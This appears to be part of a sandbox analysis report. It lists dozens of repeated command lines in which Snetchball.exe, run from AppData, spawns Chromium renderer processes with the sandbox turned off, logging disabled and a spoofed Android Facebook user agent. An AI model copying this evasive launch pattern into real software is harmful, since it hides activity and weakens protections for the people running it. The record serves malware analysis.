C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=4264 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5328
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=1932 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2272
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=4148 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4944
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=3760 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4932
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=1964 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2348
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=4108 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2116
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=1108 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5688
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=4052 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1128
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=1416 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4276
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=3840 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2580
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --mojo-platform-channel-handle=4036 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4220
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --mojo-platform-channel-handle=4172 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2884
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --mojo-platform-channel-handle=4296 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5556
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --mojo-platform-channel-handle=3720 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5384
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --mojo-platform-channel-handle=4344 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2084
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=4384 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4736
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --mojo-platform-channel-handle=4056 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:3284
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --mojo-platform-channel-handle=4440 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4592
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --mojo-platform-channel-handle=4444 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1888
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --mojo-platform-channel-handle=4328 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:752
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --mojo-platform-channel-handle=4296 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1912
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --mojo-platform-channel-handle=1196 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5296
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --mojo-platform-channel-handle=4056 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1128
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --mojo-platform-channel-handle=4508 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5456
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --mojo-platform-channel-handle=3852 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5004
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --mojo-platform-channel-handle=4164 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2156
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --mojo-platform-channel-handle=4404 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4100
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --mojo-platform-channel-handle=4392 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2352
-
